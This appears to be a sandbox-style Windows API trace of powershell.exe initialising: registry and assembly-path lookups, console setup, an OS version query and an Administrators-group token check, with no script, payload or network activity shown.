	[0636.202] VerQueryValueW (in: pBlock=0x2daaa80, lpSubBlock="\\", lplpBuffer=0x14d7f8, puLen=0x14d7f0 | out: lplpBuffer=0x14d7f8*=0x2daaaa8, puLen=0x14d7f0) returned 1
	[0636.215] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0636.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.215] CoTaskMemFree (pv=0x2b14c0) 
	[0638.048] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0638.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0638.049] CoTaskMemFree (pv=0x2b14c0) 
	[0638.053] lstrlenW (lpString="䅁") returned 1
	[0638.064] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d6c8 | out: phkResult=0x14d6c8*=0x2f8) returned 0x0
	[0638.066] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d6b8 | out: phkResult=0x14d6b8*=0x2fc) returned 0x0
	[0638.066] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d748 | out: phkResult=0x14d748*=0x300) returned 0x0
	[0638.070] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d68c, lpData=0x0, lpcbData=0x14d688*=0x0 | out: lpType=0x14d68c*=0x1, lpData=0x0, lpcbData=0x14d688*=0x56) returned 0x0
	[0638.071] CoTaskMemAlloc (cb=0x5a) returned 0x2abaa0
	[0638.071] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d65c, lpData=0x2abaa0, lpcbData=0x14d658*=0x56 | out: lpType=0x14d65c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d658*=0x56) returned 0x0
	[0638.071] CoTaskMemFree (pv=0x2abaa0) 
	[0638.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0640.129] CoTaskMemAlloc (cb=0x104) returned 0x2b14c0
	[0640.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b14c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0640.129] CoTaskMemFree (pv=0x2b14c0) 
	[0652.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0652.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0655.808] CoTaskMemAlloc (cb=0x104) returned 0x2b15d0
	[0655.809] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b15d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0655.809] CoTaskMemFree (pv=0x2b15d0) 
	[0655.810] CoTaskMemAlloc (cb=0x104) returned 0x2b15d0
	[0655.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b15d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0655.810] CoTaskMemFree (pv=0x2b15d0) 
	[0657.405] CoTaskMemAlloc (cb=0x104) returned 0x2b15d0
	[0657.405] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b15d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.405] CoTaskMemFree (pv=0x2b15d0) 
	[0657.409] CoTaskMemAlloc (cb=0x104) returned 0x2b15d0
	[0657.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b15d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.409] CoTaskMemFree (pv=0x2b15d0) 
	[0657.410] CoTaskMemAlloc (cb=0x104) returned 0x2b15d0
	[0657.410] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b15d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.410] CoTaskMemFree (pv=0x2b15d0) 
	[0663.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0663.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0664.090] CoTaskMemAlloc (cb=0x104) returned 0x2b15d0
	[0664.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b15d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.090] CoTaskMemFree (pv=0x2b15d0) 
	[0664.093] CoTaskMemAlloc (cb=0x104) returned 0x2b15d0
	[0664.093] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b15d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0664.093] CoTaskMemFree (pv=0x2b15d0) 
	[0667.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0667.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0679.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0679.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0681.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0681.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0688.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0688.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0701.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0701.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0705.274] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0705.275] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0705.275] CoTaskMemFree (pv=0x2b17f0) 
	[0705.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0705.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0705.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0705.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0710.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x14d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0710.660] SetErrorMode (uMode=0x1) returned 0x1
	[0710.660] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x14d620 | out: lpFileInformation=0x14d620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0710.660] SetErrorMode (uMode=0x1) returned 0x1
	[0723.177] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0723.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.177] CoTaskMemFree (pv=0x2b17f0) 
	[0723.178] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0723.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.178] CoTaskMemFree (pv=0x2b17f0) 
	[0723.179] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0723.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0723.179] CoTaskMemFree (pv=0x2b17f0) 
	[0723.182] CoCreateGuid (in: pguid=0x14d9e8 | out: pguid=0x14d9e8*(Data1=0xf4ccaf35, Data2=0x1735, Data3=0x43f9, Data4=([0]=0xa5, [1]=0x6d, [2]=0x11, [3]=0xe, [4]=0x26, [5]=0x18, [6]=0xdf, [7]=0x8))) returned 0x0
	[0724.608] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0724.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.608] CoTaskMemFree (pv=0x2b17f0) 
	[0724.611] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0724.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.611] CoTaskMemFree (pv=0x2b17f0) 
	[0724.613] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0724.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.613] CoTaskMemFree (pv=0x2b17f0) 
	[0724.632] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0724.634] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x14d690 | out: lpConsoleScreenBufferInfo=0x14d690) returned 1
	[0724.652] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0726.293] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x14d690 | out: lpConsoleScreenBufferInfo=0x14d690) returned 1
	[0726.294] GetVersionExW (in: lpVersionInformation=0x14d620*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d620*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0726.297] GetCurrentProcess () returned 0xffffffffffffffff
	[0726.298] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14d6b8 | out: TokenHandle=0x14d6b8*=0x2e0) returned 1
	[0726.302] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14d5d8 | out: TokenInformation=0x0, ReturnLength=0x14d5d8) returned 0
	[0726.303] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2172e0
	[0726.303] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x8, TokenInformation=0x2172e0, TokenInformationLength=0x4, ReturnLength=0x14d5d8 | out: TokenInformation=0x2172e0, ReturnLength=0x14d5d8) returned 1
	[0726.304] DuplicateTokenEx (in: hExistingToken=0x2e0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x14d738 | out: phNewToken=0x14d738*=0x2dc) returned 1
	[0726.304] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14d5d8 | out: TokenInformation=0x0, ReturnLength=0x14d5d8) returned 0
	[0726.305] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x217290
	[0726.305] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x8, TokenInformation=0x217290, TokenInformationLength=0x4, ReturnLength=0x14d5d8 | out: TokenInformation=0x217290, ReturnLength=0x14d5d8) returned 1
	[0726.306] CheckTokenMembership (in: TokenHandle=0x2dc, SidToCheck=0x2d6aa70*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x14d748 | out: IsMember=0x14d748) returned 1
	[0726.306] CloseHandle (hObject=0x2dc) returned 1
	[0726.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0726.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0726.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0726.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0727.808] CoTaskMemAlloc (cb=0x804) returned 0x1b748e10
	[0727.809] GetConsoleTitleW (in: lpConsoleTitle=0x1b748e10, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0727.809] CoTaskMemFree (pv=0x1b748e10) 
	[0727.825] CoTaskMemAlloc (cb=0x804) returned 0x1b7496c0
	[0727.825] GetConsoleTitleW (in: lpConsoleTitle=0x1b7496c0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0727.825] CoTaskMemFree (pv=0x1b7496c0) 
	[0727.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0727.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0727.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0727.827] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0727.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0727.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0727.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0727.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.689] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0731.691] CoCreateGuid (in: pguid=0x14d830 | out: pguid=0x14d830*(Data1=0x2c8d3aac, Data2=0x51c4, Data3=0x4e15, Data4=([0]=0x97, [1]=0xe3, [2]=0xaa, [3]=0xd4, [4]=0x29, [5]=0x2b, [6]=0x2c, [7]=0x4b))) returned 0x0
	[0731.692] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0731.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.692] CoTaskMemFree (pv=0x2b17f0) 
	[0733.350] WinSqmIsOptedIn () returned 0x0
	[0733.351] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0733.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.351] CoTaskMemFree (pv=0x2b17f0) 
	[0733.352] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0733.352] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.352] CoTaskMemFree (pv=0x2b17f0) 
	[0733.352] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
